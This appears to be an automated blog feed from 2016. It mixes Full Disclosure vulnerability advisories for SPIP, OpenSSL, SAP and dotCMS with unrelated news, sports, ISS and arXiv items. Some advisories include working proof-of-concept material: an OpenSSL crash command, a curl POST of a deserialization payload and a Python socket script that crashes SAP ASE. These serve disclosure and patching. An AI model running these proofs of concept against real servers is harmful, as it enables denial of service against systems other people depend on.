## SPIP 3.1.2 Server Side Request Forgery (CVE-2016-7999) ### Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. ### Vulnerability Description It's possible to send HTTP/FTP requests using the `valider_xml` file. Attackers can make it look like the server is sending the request, possibly bypassing access controls such as a firewall that would prevent the attacker from accessing the URLs directly. **Access Vector**: remote **Security Risk**: medium **Vulnerability**: CWE-918 **CVSS Base Score**: 5.5 (Medium) **CVE-ID**: CVE-2016-7999 ### Proof of Concept http://ift.tt/2dRnq8J http://ift.tt/2efDRhx ### Vulnerable code The FTP connection is initialized by the `is_dir` function inside `valider_xml`, line 79 : if (is_dir($url)) { Other PHP Wrappers supporting `is_dir` can be called using this function. The HTTP connection is initiated at line 123: $res = $transformer_xml(recuperer_page($url)); ### Timeline (dd/mm/yyyy) * 15/09/2016 : Initial discovery * 26/09/2016 : Contact with SPIP Team * 27/09/2016 : Answer from SPIP Team, sent advisory details * 27/09/2016 : Server Side Request Forgery vulnerability correct vulnerabilities. * 30/09/2016 : SPIP 3.1.3 Released ### Fixes * http://ift.tt/2cIp8sM * http://ift.tt/2dh6B42 ### Affected versions * Version <= 3.1.2 ### Credits * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-7998: SPIP 3.1.2 Template Compiler/Composer PHP Code Execution

[FD] CVE-2016-7982: SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal

## SPIP 3.1.1/3.1.2 File Enumeration / Path Traversal (CVE-2016-7982) ### Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. ### Vulnerability Description The `valider_xml` file can be used to enumerate files on the system. **Access Vector**: remote **Security Risk**: medium **Vulnerability**: CWE-538 **CVSS Base Score**: 4.9 (Medium) **CVE-ID**: CVE-2016-7982 ### Proof of Concept Enumerating `.ini` files inside `/etc` (SPIP 3.1.1) : http://ift.tt/2efE58x Bypassing SPIP 3.1.2 protection using PHP Wrappers : http://ift.tt/2dRo31Z ### Vulnerable code if (is_dir($url)) { $dir = (substr($url, -1, 1) === '/') ? $url : "$url/"; $ext = !preg_match('/^[.*\w]+$/', $req_ext) ? 'php' : $req_ext; $files = preg_files($dir, "$ext$", $limit, $rec); if (!$files and $ext !== 'html') { $files = preg_files($dir, 'html$', $limit, $rec); if ($files) { $ext = 'html'; } } if ($files) { $res = valider_dir($files, $ext, $url); list($err, $res) = valider_resultats($res, $ext === 'html'); File names are stored in `$res` and displayed by `echo` on line 146 : echo "

", $titre, '
', $bandeau, '

', "
", $onfocus, "
", $res, fin_page(); ### Timeline (dd/mm/yyyy) * 15/09/2016 : Initial discovery * 26/09/2016 : Contact with SPIP Team * 27/09/2016 : Answer from SPIP Team, sent advisory details * 27/09/2016 : Incorrect fixes for Path Traversal * 27/09/2016 : New proof of concept for bypassing Path Traversal sent. * 27/09/2016 : Bad fix for Path Traversal (23185) * 28/09/2016 : New proof of concept for bypassing fixes for Path Traversal on Windows systems. * 28/09/2016 : Fixes issued Path Traversal (23200) * 30/09/2016 : SPIP 3.1.3 Released ### Fixes * http://ift.tt/2diDCiu * http://ift.tt/2cFPvBd * http://ift.tt/2cFQbGC * http://ift.tt/2dt0zm9 * http://ift.tt/2d44Eun * http://ift.tt/2dt1cMd * http://ift.tt/2dh6SUN * http://ift.tt/2cIpeAL * http://ift.tt/2dh6B42 * http://ift.tt/2cIp8sM * http://ift.tt/2d3G4gs * http://ift.tt/2dgWnks * http://ift.tt/2cS91Xg * http://ift.tt/2cS8fJz ### Affected versions * Version <= 3.1.2 ### Credits * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-7981: SPIP 3.1.2 Reflected Cross-Site Scripting

## SPIP 3.1.2 Reflected Cross-Site Scripting (CVE-2016-7981) ### Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. ### Vulnerability Description The `var_url` parameter of the `valider_xml` file is not correctly sanitized and can be used to trigger a reflected XSS vulnerability. **Access Vector**: remote **Security Risk**: medium **Vulnerability**: CWE-79 **CVSS Base Score**: 6.8 (Medium) **CVE-ID**: CVE-2016-7981 ### Proof of Concept http://ift.tt/2dRnTrw ### Vulnerable code The `$url variable` is not properly sanitized in `valider_xml.php`, line 134 : $res = "
" . $err . "
" . "
" . $texte . '
'; $bandeau = "$url"; The Cross-Site Scripting vulnerability is triggered on line 146 : echo "

", $titre, '
', $bandeau, '

', ### Timeline (dd/mm/yyyy) * 15/09/2016 : Initial discovery * 26/09/2016 : Contact with SPIP Team * 27/09/2016 : Answer from SPIP Team, sent advisory details * 27/09/2016 : Incorrect fix from SPIP Team. * 27/09/2016 : New proof of concept for bypassing fixes for XSS sent. * 27/09/2016 : Fixes issued for XSS (23185). * 30/09/2016 : SPIP 3.1.3 Released ### Fixes * http://ift.tt/2dt1cMd * http://ift.tt/2d44Eun * http://ift.tt/2dt0zm9 ### Affected versions * Version <= 3.1.2 ### Credits * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-7980: SPIP 3.1.2 Exec Code Cross-Site Request Forgery

## SPIP 3.1.2 Exec Code Cross-Site Request Forgery (CVE-2016-7980) ### Product Description SPIP is a publishing system for the Internet, which put importance on collaborative working, multilingual environments and ease of use. It is free software, distributed under the GNU/GPL licence. ### Vulnerability Description The vulnerable request to `valider_xml` (see: *SPIP 3.1.2 Template Compiler/Composer PHP Code Execution - CVE-2016-7998*) is vulnerable to Cross-Site Request Forgery, allowing the execution of the CVE-2016-7998 attack by tricking an administrator to open the malicious link. **Access Vector**: remote **Security Risk**: high **Vulnerability**: CWE-352 **CVSS Base Score**: 8.3 (High) **CVE-ID**: CVE-2016-7980 ### Proof of Concept http://ift.tt/2dRmMrN ### Timeline (dd/mm/yyyy) * 15/09/2016 : Initial discovery * 26/09/2016 : Contact with SPIP Team * 27/09/2016 : Answer from SPIP Team, sent advisory details * 28/09/2016 : Fixes issued for CSRF * 30/09/2016 : SPIP 3.1.3 Released ### Fixes * http://ift.tt/2dt1cMd * http://ift.tt/2d44Eun * http://ift.tt/2dt0zm9 ### Affected versions * Version <= 3.1.2 ### Credits * Nicolas CHATELAIN, Sysdream (n.chatelain -at- sysdream -dot- com)

Source: Gmail -> IFTTT-> Blogger

Busted! Anonymous Drops a Massive Bomb on Hillary, Just Before NV Debate!

But the poll numbers have largely been negative. Why? Is the liberal media oversampling Democrats, and are they unable to record the historic ...

from Google Alert - anonymous http://ift.tt/2dASidy
via IFTTT

[FD] OpenSSL 1.1.0 remote client memory corruption

Triggering this requires that the client sets a very large ALPN list (several thousand bytes). This would be very unusual in a real-world application. For this reason OpenSSL does not treat this as a security vulnerability and I am inclined to agree with this decision. However, if an attacker can somehow influence the ALPN list of an OpenSSL-enabled application (perhaps through another vulnerability), the attacker can write arbitrary data past OpenSSL's heap buffer. openssl s_client -reconnect -status -alpn `python -c "import sys; sys.stdout.write('x,'*4000+'x')"` If the server sends a session ticket with a special length (16022 bytes), the client will crash. More technical details here: http://ift.tt/2dpFiYx

Source: Gmail -> IFTTT-> Blogger

[FD] Man in the Middle Remote Code Execution Vulnerability in WineBottler and its Bundles

[FD] [ERPSCAN-16-030] SAP NetWeaver - buffer overflow vulnerability

[FD] [ERPSCAN-16-029] SAP NetWeaver AS JAVA - deserialization of untrusted user value

Application: SAP EP-RUNTIME component Versions Affected: SAP EP-RUNTIME 7.5 Vendor URL: http://SAP.com Bugs: Denial of Service Sent: 22.04.2016 Reported: 23.04.2016 Vendor response: 23.04.2016 Date of Public Advisory: 12.07.2016 Reference: SAP Security Note 2315788 Author: Mathieu Geli (ERPScan) Description 1. ADVISORY INFORMATION Title: [ERPSCAN-16-029] SAP NetWeaver AS JAVA – deserialization of untrusted user value Advisory ID: [ERPSCAN-16-029] Risk: High Advisory URL: http://ift.tt/2emACBH Date published: 12.17.2016 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: Denial of Service Impact: DoS Remotely Exploitable: Yes Locally Exploitable: No CVSS Information CVSS Base Score v3: 4.9 / 10 CVSS Base Vector: AV : Attack Vector (Related exploit range) Network (N) AC : Attack Complexity (Required attack complexity) Low (L) PR : Privileges Required (Level of privileges needed to exploit) High (H) UI : User Interaction (Required user participation) None (N) S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U) C : Impact to Confidentiality None (N) I : Impact to Integrity None (N) A : Impact to Availability High (H) 3. VULNERABILITY DESCRIPTION An attacker can use a special HTTP request in order to force a server to deserialize evil objects, which results in denial of service. 4. VULNERABLE PACKAGES SAP EP-RUNTIME component 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2315788 6. AUTHOR Mathieu Geli (ERPScan) 7. TECHNICAL DESCRIPTION PoC Evil object in 'serial.cc3' as an attachment in this bug entry. It was generated with ysoserial framework, if the commons.collections jar was in the CLASSPATH we will have direct RCE. Now, we can only send DoS payloads that will trigger OutOfMemory exception on 7.5. Payload for that as attachment named 'serial.mem'. curl -v -XPOST --user 'user:password' http://ift.tt/2eSAAEx --data-binary @serial.cc3 This request will trigger a series of exceptions in server's log. The DoS payload will render the server unstable for some minutes with following exception: Server process shutting down with exit code [666] memory allocation error [OutOfMemoryError] java.lang.OutOfMemoryError: Requested array size exceeds VM limit (failed to allocate 8589934576 bytes) (array length 2147483639) 8. REPORT TIMELINE Sent: 22.04.2016 Reported: 23.04.2016 Vendor response: 23.04.2016 Date of Public Advisory: 12.07.2016 9. REFERENCES http://ift.tt/2emACBH 10. ABOUT ERPScan Research ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013. ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies. ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches. ERPScan experts were interviewed in specialized infosec resources and featured in major media worldwide. Among them there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale. We ‘follow the sun’ and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] [ERPSCAN-16-028] SAP Adaptive Server Enterprise - DoS vulnerability

Application: SAP Adaptive Server Enterprise Versions Affected: SAP Adaptive Server Enterprise 16 Vendor URL: http://SAP.com Bugs: Denial of Service Sent: 01.02.2016 Reported: 02.02.2016 Vendor response: 02.02.2016 Date of Public Advisory: 12.07.2016 Reference: SAP Security Note 2330839 Author: Vahagn Vardanyan(ERPScan) Description 1. ADVISORY INFORMATION Title: [ERPSCAN-16-028] SAP Adaptive Server Enterprise – DoS vulnerability Advisory ID: [ERPSCAN-16-028] Risk: high Advisory URL: http://ift.tt/2eSBPmY Date published: 12.17.2016 Vendors contacted: SAP 2. VULNERABILITY INFORMATION Class: Denial of Service Impact: DoS Remotely Exploitable: yes Locally Exploitable: yes CVSS Information CVSS Base Score v3: 7.5 / 10 CVSS Base Vector: AV : Attack Vector (Related exploit range) Network (N) AC : Attack Complexity (Required attack complexity) Low (L) PR : Privileges Required (Level of privileges needed to exploit) None (N) UI : User Interaction (Required user participation) None (N) S : Scope (Change in scope due to impact caused to components beyond the vulnerable component) Unchanged (U) C : Impact to Confidentiality None (N) I : Impact to Integrity None (N) A : Impact to Availability High (H) 3. VULNERABILITY DESCRIPTION Anonymous attacker can send a special request to the SAP Adaptive Server Enterprise and crash the server. 4. VULNERABLE PACKAGES SAP Open Server 16.0 SP01, SP02 SAP ASE 16.0 SP01, SP02 SAP Replication Server SP207, SP209, SP210, SP3XX 5. SOLUTIONS AND WORKAROUNDS To correct this vulnerability, install SAP Security Note 2330839 6. AUTHOR Vahagn Vardanyan (ERPScan) 7. TECHNICAL DESCRIPTION Proof of Concept Sending special request to the SAP Adaptive Server Enterprise 16 (backup server) can get crash the server. PoC import socket PoC = "\xe2\xf3\x00\x9d\x80\x8e\xf3\xa0" \ "\x80\xb4\x00\x81\xb0\x00\x00\x93" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x31\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x34\x31\x30\x35\x37\x32" \ "\x37\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00\x00\x00\x00\x00\x00\x00\x00" \ "\x00" s = socket.socket() s.settimeout(1) s.connect((SERVER_IP, SERVER_PORT)) s.send(PoC) print(PoC) s.close() ``` 0:019> r rax=0000000000000000 rbx=000000000097c000 rcx=0000000000000000 rdx=00000000010bf810 rsi=0000000000970a30 rdi=0000000000904cb0 rip=00000000004027b4 rsp=00000000010bf7f0 rbp=0000000000000000 r8=0000000000904c90 r9=0000000000904ca0 r10=0000000000000000 r11=0000000000000246 r12=0000000000000000 r13=0000000000000000 r14=0000000000000000 r15=0000000000000000 iopl=0 nv up ei pl nz na po nc cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 libsybcomn64!comn_symkey_set_iv+0x34: 00000000`004027b4 488b4820 mov rcx,qword ptr [rax+20h] ds:00000000`00000020=???????????????? ``` 8. REPORT TIMELINE Sent: 01.02.2016 Reported: 02.02.2016 Vendor response: 02.02.2016 Date of Public Advisory: 12.07.2016 9. REFERENCES http://ift.tt/2eSBPmY 10. ABOUT ERPScan Research ERPScan research team specializes in vulnerability research and analysis of critical enterprise applications. It was acknowledged multiple times by the largest software vendors like SAP, Oracle, Microsoft, IBM, VMware, HP for discovering more than 400 vulnerabilities in their solutions (200 of them just in SAP!). ERPScan researchers are proud of discovering new types of vulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the "The Best Server-Side Bug" nomination at BlackHat 2013. ERPScan experts participated as speakers, presenters, and trainers at 60+ prime international security conferences in 25+ countries across the continents ( e.g. BlackHat, RSA, HITB) and conducted private trainings for several Fortune 2000 companies. ERPScan researchers carry out the EAS-SEC project that is focused on enterprise application security awareness by issuing annual SAP security researches. ERPScan experts were interviewed in specialized info-sec resources and featured in major media worldwide. Among them there are Reuters, Yahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise, Chinabyte, etc. Our team consists of highly-qualified researchers, specialized in various fields of cybersecurity (from web application to ICS/SCADA systems), gathering their experience to conduct the best SAP security research. 11. ABOUT ERPScan ERPScan is the most respected and credible Business Application Cybersecurity provider. Founded in 2010, the company operates globally and enables large Oil and Gas, Financial, Retail and other organizations to secure their mission-critical processes. Named as an ‘Emerging Vendor’ in Security by CRN, listed among “TOP 100 SAP Solution providers” and distinguished by 30+ other awards, ERPScan is the leading SAP SE partner in discovering and resolving security vulnerabilities. ERPScan consultants work with SAP SE in Walldorf to assist in improving the security of their latest solutions. ERPScan’s primary mission is to close the gap between technical and business security, and provide solutions for CISO's to evaluate and secure SAP and Oracle ERP systems and business-critical applications from both cyberattacks and internal fraud. As a rule, our clients are large enterprises, Fortune 2000 companies and MSPs, whose requirements are to actively monitor and manage security of vast SAP and Oracle landscapes on a global scale. We ‘follow the sun’ and have two hubs, located in Palo Alto and Amsterdam, to provide threat intelligence services, continuous support and to operate local offices and partner network spanning 20+ countries around the globe. Adress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301 Phone: 650.798.5255 Twitter: @erpscan Scoop-it: Business Application Security

Source: Gmail -> IFTTT-> Blogger

[FD] CVE-2016-8600 dotCMS - CAPTCHA bypass by reusing valid code

Title: CVE-2016-8600 dotCMS - CAPTCHA bypass by reusing valid code Credit: Elar Lang / http://ift.tt/1WV5vQa Vulnerability: CAPTCHA bypass by re-using last loaded valid CAPTCHA code Vulnerable version: before 3.6.0 CVE: CVE-2016-8600 Vendor/Product: dotCMS (http://dotcms.com/) # Background and description It's possible to re-use valid CAPTCHA code in dotCMS framework. Last loaded CAPTCHA code is stored in session and CAPTCHA code is renewed only when you reload image /Captcha.jpg from server. But if you don't reload it, you can use previous valid CAPTCHA code till your session is alive. Problem was first announced with CRLF/Email Header Injection: * link1: http://ift.tt/2eGYLGM * link2: http://ift.tt/1OOp6Js # Preconditions Attacker must first fill manually valid CAPTCHA code. No other pre-conditions - no authentication or authorization needed. # Proof-of-Concept You need to detect from a dotCMS server: * valid CAPTCHA by loading /Captcha.jpg * your session id (JSESSIONID) value If some form asks CAPTCHA, you can use those 2 values for sending valid data. Proof-of-Concept with a detailed description is available at: http://ift.tt/2eGYLGM # Vulnerability Disclosure Timeline First I mentioned CAPTCHA reuse possibility in other reports 2015-12-07 | me > dotCMS | CAPTCHA reuse possibility is mentioned in Email Header Injection description 2015-12-14 | me > dotCMS | asked feedback in other set of reported vulnerabilities As reported Email Header Injection and different SQL injections were fixed and CAPTCHA reuse wasn't fixed, I Reported separately 2016-05-27 | me > dotCMS | description of CAPTCHA reuse process 2016-06-29 | me > dotCMS | any comments or feedback? 2016-07-06 | dotCMS > me | confirmed bug and opened issue 2016-07-06 | dotCMS | opened issue in GitHub | "Captcha can be programmatically reused by passing session id #9330" 2016-07-07 | me > mitre.org | CVE requested .. no response 2016-09-02 | dotCMS | dotCMS version 3.6.0 release 2016-10-10 | me > mitre.org | CVE requested via web form 2016-10-11 | mitre.org > me | CVE-2016-8600 assigned 2016-10-17 | me | Full Disclosure on security.elarlang.eu # Fixes Update dotCMS at least to version 3.6.0 Issue description and timeline: http://ift.tt/2eGYJPa

Source: Gmail -> IFTTT-> Blogger

Breaking — Russian Hacker Responsible for LinkedIn Data Breach Arrested by FBI

The alleged Russian hacker arrested by the FBI in collaboration with the Czech police is none other than the hacker who was allegedly responsible for massive 2012 data breach at LinkedIn, which affected nearly 117 Million user accounts. Yevgeniy N, 29-year-old Russian hacker was arrested in Prague on October 5 suspected of participating in conducting cyber-attacks against the United States,


from The Hacker News http://ift.tt/2et9jUR
via IFTTT

Russian Hacker who was wanted by FBI arrested in Prague

Czech police, in cooperation with the FBI, has arrested a Russian citizen in Prague suspected of participating in conducting cyber-attacks against the United States. Czech police announced the arrest on its official website Tuesday evening, without giving any further details about the man and for what he is wanted for. Alleged Russian Hacker, whose name has not yet been disclosed, was


from The Hacker News http://ift.tt/2ehAaGP
via IFTTT

Ravens: QB Joe Flacco dealing with right shoulder injury, still has "legitimate shot" at playing Sunday - John Harbaugh (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

Ravens: QB Joe Flacco not practicing Wednesday after taking several hard hits against Giants on Sunday (ESPN)

from ESPN http://ift.tt/17lH5T2
via IFTTT

ISS Daily Summary Report – 10/18/2016

Orbital ATK (OA)-5 Launch:  The Cygnus spacecraft successfully launched from Wallops Island, Virginia atop an Antares rocket on Monday at 6:45pm CDT. The spacecraft will loiter until after 48S docking, scheduled for Friday, October 21st. Cygnus approach, capture, and berthing will occur on Sunday, 23-October. Cygnus will be delivering approximately 2,400 kg of pressurized cargo to the ISS. RapidScat Troubleshooting:  On Friday, August 19, 2016 (GMT 232), the Columbus Module experienced a power anomaly where Power Distribution Unit 1 (PDU-1) and a subset of the loads on PDU-1 lost power.  Several pieces of equipment were affected, in particular RapidScat operational power, was lost.  After successful re-activation of Outlet 3, RapidScat could not be activated and follow up troubleshooting was also unsuccessful.   To recover power to the SOLAR payload the crew manually reconfigured the Payload Power Switching Box (PPSB) – Starboard Deck X-Direction (SDX) Switch 1 in order to isolate RapidScat from the circuit.  The outlet was then successfully reactivated with power to SOLAR and the source of the trips as isolated to RapidScat’s SDX site.  This morning FE-5 and ground teams attempted to activate PDU1 Outlet 3 with RapidScat as the sole external payload on the circuit to further troubleshoot the RapidScat issues.  During this morning’s attempt to repower RapidScat there was another Overcurrent Trip, which ended the troubleshooting steps for the day.  Ground teams have returned system back to the configuration prior to the troubleshooting. Biological Rhythms 48-Hour Collection: FE-5 concluded the 48-hour data collection session this morning, doffing the Cardiolab Holter Harness and Actiwatch, then saved the data from the two devices for ground teams to download and review.  Biological Rhythms 48 hours is a Japan Aerospace Exploration Agency (JAXA) experiment that studies the effects of long-term microgravity exposure on heart function by analyzing an astronaut’s electrocardiogram for 48 hours. Cardio Ox Ultrasound: With scanning assistance from FE-6 and ground remote guidance specialists, FE-5 performed the Return minus 15 day (R-15) Cardio Ox ultrasound session.  Prior to scanning, FE-5 donned Electrocardiogram (ECG) electrodes, marked the Carotid and Brachial arteries to make locating them easier. The goal of Cardio Ox is to determine whether biological markers of oxidative and inflammatory stress are elevated during and after space flight and whether this results in an increased, long-term risk of atherosclerosis risk in astronauts. Water Monitoring Suite (WMS): FE-6 configured the Maintenance Work Area (MWA) then the WMS’s Microbial Monitoring System (MMS) to test ISS unfiltered water from a Total Organic Carbon Analyzer (TOCA) sample collection taken earlier in the day.  The two test runs were performed first using a low Deoxyribonucleic acid (DNA) concentration pouch and the second using a high DNA concentration pouch. The WMS is a set of hardware that monitors microbes, silica and organic material in the water supply on the ISS. The hardware ensures crew members can test and monitor the safety of their water supplies on future space missions, especially on long-duration missions to Mars, asteroids or other destinations where Earth-based testing would be difficult or impossible.  Cardiac and Vessel Structure and Function with Long-Duration Space Flight and Recovery (Vascular Echo) Doppler Measurements: FE-5 configured the Cardiolab Portable Doppler (CDL PDOP) then donned the PDOP femoral probe.  The crew performed two data collection sessions, each after a 1-minute light exercise session.  The Vascular Echo experiment investigates the stiffening of the arteries and increased blood pressure (hypertension) observed in some returning ISS crewmembers.  By observing the changes in blood vessels, and the heart, while the crew members are in space and following their recovery on return to Earth, investigators hope to provide insight into potential countermeasures to help maintain crew member health, and quality of life. NanoRacks File Transfer Test: Ground controllers activated the NanoRacks Plate Reader 2 and successfully tested a file transfer capability to the NanoRacks External Platform (NREP) facility.  This capability will be used for the NanoRacks Charge-Injection Device (CID) currently slated for launch on HTV-6.  Today’s Planned Activities All activities were performed unless otherwise noted. МОРЗЭ Evaluation using SPRUT-2 Crew reconfigures the SDN & SOZ switches on PPSB 1 Potable Water Dispenser (PWD) Sample Collect Biological Rhythms 48 Holter data Save МОРЗЭ Psycho-physiological Evaluation: Tsentrovka, SENSOR Tests Ultrasound 2 HRF Rack 1 Power On Cardio Ox Ultrasound Scan Total Organic Carbon Analyzer (TOCA) Potable Water Dispenser (PWD) Sample Analysis МОРЗЭ Psycho-physiological Evaluation: Cattell’s Test Cardio Ox CDL Holter Arterial BP Measurement – Subject Microbial Capture Devices (MCD) and Coliform Water Processing МОРЗЭ Psycho-physiological Evaluation: Strelau Test Cardio Ox CDL Holter Arterial BP Hardware Doff – Subject Biological Rhythms 48 Actiwatch Save МОРЗЭ Psycho-physiological Evaluation: SUPOS Test Crew Departure Preparations for Return to Earth LBNP Exercise (PRELIMINARY) Crew reconfigures the SDX switch on PPSB 1 МОРЗЭ. Closeout Ops Collecting atmospheric condensate samples [КАВ] from [СРВ-К2М] up to Gas-Liquid Mixture Filter (ФГС) to Russian Samplers, terminate Sampling atmospheric condensate [КАВ] up to СРВ-К2М БКО (Water Purification Column Unit), configuration set up, sampler installation (drink bag) Crew Departure Preparations for Return to Earth Total Organic Carbon Analyzer (TOCA) Sample Data Record Microbial Monitoring System Hardware Gather Microbial Monitoring System MWA Preperation Vascular Echo Exercise PDOP Measurement – Subject Sampling atmospheric condensate [КАВ] up to БКО СРВ-К2М, Sampler changeout (drink bag) Microbial Monitoring System Sample Setup Filling (separation) of ЕДВ (КОВ) for Elektron or ЕДВ-СВ. Public Affairs Office (PAO) Event in High Definition (HD) – Lab СОЖ maintenance Microbial Monitoring System Sample Photo T/V (P/TV) Advanced Resistive Exercise Device (ARED) Exercise Video Setup Microbial Monitoring System Data Transfer Sampling atmospheric condensate [КАВ] up to БКО СРВК-2М, sampler (drink bag) removal, configuration teardown Advanced Resistive Exercise Device (ARED) Exercise Video Stow Completed Task List Items Biomolecule Sequencer MELFI Retrieve 1 & 2 Biomolecule Sequencer Sample Initialization Ground Activities All activities were performed unless otherwise noted. Lab MCA Full Calibration Three-Day Look Ahead: Wednesday, 10/19: 47S Return Preps, 48S Launch, MDCA Hose Replace Thursday, 10/20: Off Duty Friday, 10/21: 48S Docking QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 […]

from ISS On-Orbit Status Report http://ift.tt/2egNnzV
via IFTTT

Police Scan 117 Million Driving Licence Photos for Face Recognition Database

Your driver's license photo could be scarier than it actually looks — Well, here's why: With the help of state driver's license data, U.S. law enforcement agencies have created a huge a face-recognition database of more than 117 Million American adults that are regularly scanned in the course of police investigations. What's even worse? Most of those people who are scanned by police without


from The Hacker News http://ift.tt/2e0LhSV
via IFTTT

Winers Anonymous

Winers Anonymous. By Phil Callaway · Previous Next.;. Listen to today's Laugh Again called “Winers Anonymous” with Phil Callaway ...

from Google Alert - anonymous http://ift.tt/2ekmclF
via IFTTT

16 OCT 16 CMA Announcements

16OCT16 CMA Announcements The next CMA Intergroup meeting is November 11th, 8PM at the Center on Halsted, meeting room 204. Meeting ...

from Google Alert - anonymous http://ift.tt/2ejQpou
via IFTTT

The Antlia Cluster of Galaxies


Galaxies dot the sky in this impressively wide and deep image of the Antlia Cluster. The third closest cluster of galaxies to Earth after Virgo and Fornax, the Antlia cluster is known for its compactness and its high fraction of elliptical galaxies over (spirals. Antlia, cataloged as Abell S0636, spans about 2 million light years and lies about 130 million light years away toward the constellation of the Air Pump (Antlia). The cluster has two prominent galaxy groups - bottom center and upper left -- among its over 200 galactic members, but no single central dominant galaxy. The vertical red ribbon of gas on the left is thought related to the foreground Antlia supernova remnant and not associated with the cluster. The featured image composite, taken from New Zealand, resulted from 150+ hours of exposures taken over six months. via NASA http://ift.tt/2egQ4iQ

Tuesday, October 18, 2016

VRPBench: A Vehicle Routing Benchmark Tool. (arXiv:1610.05402v1 [cs.AI])

The number of optimization techniques in the combinatorial domain is large and diversified. Nevertheless, there is still a lack of real benchmarks to validate optimization algorithms. In this work we introduce VRPBench, a tool to create instances and visualize solutions to the Vehicle Routing Problem (VRP) in a planar graph embedded in the Euclidean 2D space. We use VRPBench to model a real-world mail delivery case of the city of Artur Nogueira. Such scenarios were characterized as a multi-objective optimization of the VRP. We extracted a weighted graph from a digital map of the city to create a challenging benchmark for the VRP. Each instance models one generic day of mail delivery with hundreds to thousands of delivery points, thus allowing both the comparison and validation of optimization algorithms for routing problems.



from cs.AI updates on arXiv.org http://ift.tt/2dlXvYr
via IFTTT

Makespan Optimal Solving of Cooperative Path-Finding via Reductions to Propositional Satisfiability. (arXiv:1610.05452v1 [cs.AI])

The problem of makespan optimal solving of cooperative path finding (CPF) is addressed in this paper. The task in CPF is to relocate a group of agents in a non-colliding way so that each agent eventually reaches its goal location from the given initial location. The abstraction adopted in this work assumes that agents are discrete items moving in an undirected graph by traversing edges. Makespan optimal solving of CPF means to generate solutions that are as short as possi-ble in terms of the total number of time steps required for the execution of the solution.

We show that reducing CPF to propositional satisfiability (SAT) represents a viable option for obtaining makespan optimal solutions. Several encodings of CPF into propositional formulae are suggested and experimentally evaluated. The evaluation indicates that SAT based CPF solving outperforms other makespan optimal methods significantly in highly constrained situations (environments that are densely occupied by agents).



from cs.AI updates on arXiv.org http://ift.tt/2dZO4Mk
via IFTTT

Diagnosis of aerospace structure defects by a HPC implemented soft computing algorithm. (arXiv:1610.05521v1 [cs.AI])

